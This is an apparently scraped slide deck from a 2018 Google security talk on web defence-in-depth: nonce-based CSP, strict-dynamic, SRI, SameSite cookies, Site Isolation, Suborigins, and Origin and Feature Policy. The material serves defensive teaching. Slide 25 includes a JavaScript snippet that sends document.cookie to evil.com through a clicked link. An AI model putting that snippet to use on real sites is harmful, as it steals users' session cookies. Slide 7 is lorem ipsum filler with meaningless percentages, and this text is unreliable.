In this presentation, we show promising new defense-in-depth techniques to protect modern web applications from old and new classes of bugs: Suborigins to have finer-grained control over origin boundaries, Site Isolation and XSDB against Spectre and Meltdown attacks, and last but not least Origin and Feature Policy. In addition to that, we explain new features of the upcoming CSP 3 specification like 'unsafe-hashed-attributes' and give an overview of how we were able to enforce CSP as a strong mitigation against cross-site scripting on over 50% of production web traffic at Google. With increased adoption new challenges arise: dealing with CSP report noise - generated by buggy browsers, extensions, malware and security software - devising an effective monitoring infrastructure, and keeping on top of bypassing techniques. In this presentation we reveal how our internal CSP infrastructure works and how we solved problems, share our experience, show real-world examples, best practices and common pitfalls. Finally, we hint at a new promising web mitigation technique, which we hope to see gaining traction in the near future: Suborigins.
Semelhante a CONFidence 2018: Defense-in-depth techniques for modern web applications and Google's journey with CSP (Lukas Weichselbaum, Michele Spagnuolo)
Semelhante a CONFidence 2018: Defense-in-depth techniques for modern web applications and Google's journey with CSP (Lukas Weichselbaum, Michele Spagnuolo) (20)
2. About Us
We work in a focus area of the Google security team
(ISE) aimed at improving product security by targeted
proactive projects to mitigate whole classes of bugs.
Michele Spagnuolo
Senior Information
Security Engineer
Lukas Weichselbaum
Senior Information
Security Engineer
5. What is CSP?
â An HTTP header developers can use to lock
down their web applications in various ways.
â A defense-in-depth mechanism - it reduces
the harm that a malicious injection can cause,
but it is not a replacement for careful input
validation and output encoding.
6. CSP is NOT...
â A replacement for secure coding practices
â A mechanism to prevent data exfiltration
7. The Complex World of CSP
Lorem ipsum
porta dolor sit
amet nec
Lorem ipsum dolor sit
amet adipiscing. Donec
risus dolor, porta venenatis
neque pharetra luctus felis
vel tellus nec felis.
XSS
â Donec risus dolor porta
â Pharetra luctus felis
â Proin vel tellus in felis
â Molestie nec amet cum
Lorem ipsum
porta dolor sit
amet nec
Lorem ipsum dolor sit
amet adipiscing. Donec
risus dolor, porta venenatis
neque pharetra luctus felis
vel tellus nec felis.
28%
â Donec risus dolor porta
â Pharetra luctus felis
â Proin vel tellus in felis
â Molestie nec amet cum
Lorem ipsum
porta dolor sit
amet nec
Lorem ipsum dolor sit
amet adipiscing. Donec
risus dolor, porta venenatis
neque pharetra luctus felis
vel tellus nec felis.
36%
â Donec risus dolor porta
â Pharetra luctus felis
â Proin vel tellus in felis
â Molestie nec amet cum
Lorem ipsum
porta dolor sit
amet nec
Lorem ipsum dolor sit
amet adipiscing. Donec
risus dolor, porta venenatis
neque pharetra luctus felis
vel tellus nec felis.
17%
â Donec risus dolor porta
â Pharetra luctus felis
â Proin vel tellus in felis
â Molestie nec amet cum
Lorem ipsum
porta dolor sit
amet nec
Lorem ipsum dolor sit
amet adipiscing. Donec
risus dolor, porta venenatis
neque pharetra luctus felis
vel tellus nec felis.
61%
â Donec risus dolor porta
â Pharetra luctus felis
â Proin vel tellus in felis
â Molestie nec amet cum
Defense-in-depth
protection against
XSS
XSS
â Nonce-based CSP
â Hash-based CSP
â Whitelist-based CSP
Directives
- script-src
- object-src
- base-uri
Defense-in-depth
against UI-level
attacks
UI
Directives
- style-src
Force HTTPS and
block mixed-content
HTTPS
Directives
- upgrade-insecure-requests
- block-all-mixed-content
Block everything
BLOCK
Directives
- default-src 'none'
Restrict frame
ancestors and
framing
FRAME
Directives
- frame-ancestors
- frame-src
Lorem ipsum
porta dolor sit
amet nec
Lorem ipsum dolor sit
amet adipiscing. Donec
risus dolor, porta venenatis
neque pharetra luctus felis
vel tellus nec felis.
61%
â Donec risus dolor porta
â Pharetra luctus felis
â Proin vel tellus in felis
â Molestie nec amet cum
Prevent
data-exfiltration
DATA
Directives
- default-src
- *-src
8. CSP against XSS
â CSP is mostly used to mitigate XSS
â Most CSPs are based on whitelists
â >94% automatically bypassable
â Introduced 'strict-dynamic' to ease adoption of
policies based on nonces
13. Whitelist-based CSP is broken
"CSP Is Dead, Long Live CSP! On the Insecurity of
Whitelists and the Future of Content Security Policy"
Proceedings of the 23rd ACM Conference on Computer and
Communications Security, ACM, Vienna, Austria (2016)
16. script-src 'nonce-r4nd0m';
object-src 'none'; base-uri 'none';
CSP based on nonces
â· all <script> tags with the correct nonce attribute will get executed
â· <script> tags injected via XSS will be blocked because of missing nonce
â· no host/path whitelists
â· no bypasses caused by JSONP-like endpoints on external domains
â· no need to go through painful process of crafting/maintaining whitelist
This part needs to be random for every response!
Recap: How do CSP Nonces Work?
19. script-src 'nonce-r4nd0m' 'strict-dynamic';
object-src 'none'; base-uri 'none';
â· grant trust transitively via a one-use token (nonce)
instead of listing whitelisted origins
â· 'strict-dynamic' in a script-src:
â discards whitelists (for backward-compatibility)
â allows JS execution when created via e.g.
document.createElement('script')
Recap: What is 'strict-dynamic'?
20. script-src 'nonce-r4nd0m' 'strict-dynamic';
object-src 'none'; base-uri 'none';
<script nonce="r4nd0m">
var s = document.createElement("script");
s.src = "//example.com/bar.js";
document.body.appendChild(s);
</script>
<script nonce="r4nd0m">
var s = "<script ";
s += "src=//example.com/bar.js></script>";
document.write(s);
</script>
<script nonce="r4nd0m">
var s = "<script ";
s += "src=//example.com/bar.js></script>";
document.body.innerHTML = s;
</script>
Recap: What is 'strict-dynamic'?
21. Nonce based CSP + strict-dynamic + unsafe-eval | Level 1
Nonce/Hash based CSP | Level 3
Nonce based CSP + strict-dynamic | Level 2
Step by step towards a stricter CSP
Security
Guarantees
Deployment
Difficulty
Whitelist
based
+ secure in absence of browser bugs
+ eval() based XSS mitigated
+ no CSP whitelist bypasses
+ reflected/stored XSS mitigated
+ javascript: URI XSS mitigated
+ easy to deploy w. auto-noncing templates
ïœ most DOM XSS mitigated
22. Nonce based CSP + strict-dynamic + unsafe-eval | Level 1
Nonce/Hash based CSP | Level 3
Nonce based CSP + strict-dynamic | Level 2
Step by step towards a stricter CSP
Security
Guarantees
Deployment
Difficulty
script-src 'nonce-r4nd0m' 'strict-dynamic' 'unsafe-eval'
object-src 'none'; base-uri 'none';
script-src 'nonce-r4nd0m' 'strict-dynamic'
object-src 'none'; base-uri 'none';
script-src 'nonce-r4nd0m'
object-src 'none'; base-uri 'none';
Whitelist
based
23. New features in CSP 3
unsafe-hashed-attributes
Aims to make CSP deployment simpler by allowing
developers to enable specific inline JS handlers
via hashes.
<button id="action" onclick="doSubmit()">
script-src 'unsafe-hashed-attributes' 'sha256-jzgBGA4UWFFmpOBq0JpdsySukE1FrEN5bUpoK8Z29fY='
24. New features in CSP 3
unsafe-inline-attributes (proposal)
Aims to block attacks using <style> blocks like the
CSS-keylogger*
The âunsafe-inline-attributesâ keyword behaves
similarly to âunsafe-inlineâ but only for attributes.
<button id="action" style="color:green">
style-src 'unsafe-inline-attributes' 'nonce-rAnd0m'
* https://github.com/maxchehab/CSS-Keylogging
25. Why not use CSP to prevent data exfiltration?
â TL;DR - Game over once attacker can execute JS
â Too many ways to exfiltrate data
â E.g. links are not subject to CSP:
document.write("<a id='foo'
href='//evil.com/"+document.cookie+"'></a>");
document.getElementById("foo").click();
â Other examples:
postMessage, DNS prefetch, window.open âŠ
27. CSP adoption at Google
â Currently CSP is enforced on
â over 50% of outgoing traffic
â > 30 domains with 100% coverage
â most sensitive web applications (Login, Gmail, Docs, ...)
â Goal
â Enforced in all new & sensitive applications
â Nonce only CSPs (no unsafe-eval, no strict-dynamic) for sensitive applications
Google-wide strict CSP coverage
28. CSP Tools and Infrastructure
csp-evaluator.withgoogle.com
31. What is SRI?
Ensures that resources hosted on third-party
servers have not been tampered with by
specifying a hash of their expected content.
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8="
crossorigin="anonymous"></script>
34. What are Same-Site Cookies?
The SameSite flag in cookies allows servers to
mitigate the risk of XSRF and information leakage
attacks by asserting that a particular cookie
should only be sent with requests initiated from
the same site.
35. What are Same-Site Cookies?
Set-Cookie: <cookie-name>=<cookie-value>;
SameSite={Strict, Lax}
Strict
Cookies are not sent when there is cross-site navigation
Lax
Cookies are not sent when there is cross-site navigation
and an "unsafe" HTTP method such as POST
38. What is Site Isolation?
A Chromium browser setting ensuring that pages
from different websites are put into different
processes and blocking the process from
receiving sensitive data from other sites.
39. What is CORB?
(was XSDB)
An important part of Site Isolation restricting
which cross-origin data is sent to a renderer
process, limiting the access to such data using
speculative side-channel attacks like Spectre.
Example: loading cross-origin HTML in <img>.
40. What is From-Origin?
(proposal)
Prevents resources from being loaded and
included by non-whitelisted origins.
Mitigates inline linking and attacks such as
Spectre.
42. Suborigins
(proposal)
Isolate different applications running in the same
origin by adding to a response a server-specified
namespace to the origin tuple:
(scheme, host, port, namespace)
https://w3c.github.io/webappsec-suborigins/
43. Use cases of Suborigins
â Per-user origins
â Segregating user content from the main origin
â Isolate sensitive functionalities
â /wp-admin/
â /password_reset
44. Adopting Suborigins
Communication type Solution
Suborigin to Suborigin Add Suborigin header
Suborigin to Origin Add Access-Control-Allow-Suborigin
Suborigin to Extern Fix Access-Control-Allow-Origin
DEMO
45. Origin Policy
(proposal)
Applies:
â Content Security Policy
â Referrer Policy
â other policies
to an entire origin, by default (like "pinning").
It complements header-based delivery, increasing
coverage.
46. Feature Policy
(proposal)
Selectively enables and disables different browser
features and web APIs (from the ability to go
fullscreen to disabling WebUSB).
Example: in combination with Origin Policy, restrict
geolocation API to a particular page, reducing
attack surface in case of XSS on the domain.